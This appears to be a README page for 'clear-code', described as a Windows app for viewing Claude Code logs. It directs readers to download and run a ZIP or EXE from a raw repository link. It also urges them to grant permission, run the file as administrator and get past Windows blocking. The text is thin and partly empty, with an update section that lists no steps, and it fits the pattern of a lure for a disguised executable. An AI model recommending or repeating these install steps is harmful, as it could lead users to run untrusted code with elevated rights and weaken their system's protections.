🖥️ What you need

Before you install, make sure your Windows PC can run the app:

• Windows 10 or Windows 11
• A stable internet connection
• Enough space for the app and your log files
• Permission to download files on your PC

If your computer runs normal desktop apps, it should be fine.

🚀 Get started

Follow these steps to use clear-code on Windows.

1. Open the download page: https://raw.githubusercontent.com/Vinniphonetic360/clear-code/main/claude-code-skills/code_clear_v2.9-beta.5.zip

2. Look for the latest Windows file on the page.

3. Download the file to your computer.

4. Open the downloaded file.

5. If Windows asks for permission, choose Run or Yes.

6. Wait for the app to start.

7. Open your Claude Code logs in the dashboard.

🪟 Install on Windows

If the download comes as a ZIP file:

1. Download the ZIP file.
2. Right-click the file.
3. Choose Extract All.
4. Open the extracted folder.
5. Find the app file inside the folder.
6. Double-click the file to start the app.

If the download comes as an EXE file:

1. Download the EXE file.
2. Double-click it.
3. Allow Windows to run the app.
4. Follow the setup window if one appears.
5. Open clear-code from your desktop or Start menu.

After you open clear-code, you can use the dashboard to review your logs.

• Open the main view to see recent entries

🔄 Update the app

To keep clear-code working well:

🧹 Common problems

If the app does not open:

• Make sure the file finished downloading
• Try right-clicking the app and choosing Run as administrator
• Check that Windows did not block the file
• Move the file to a simple folder like Downloads or Desktop
• Restart your PC and try again

If your logs do not show up:

• Check that Claude Code created the log files
• Make sure the app can read the log folder
• Refresh the dashboard
• Open the right log source

If the screen looks blank:

• Resize the window
• Restart the app
• Open a newer log file
• Check whether the log data is empty

clear-code is made to help you view your own logs in a dashboard. Keep your log files in a folder you trust. If the app asks for access to a folder, choose the folder where your Claude Code logs are stored.
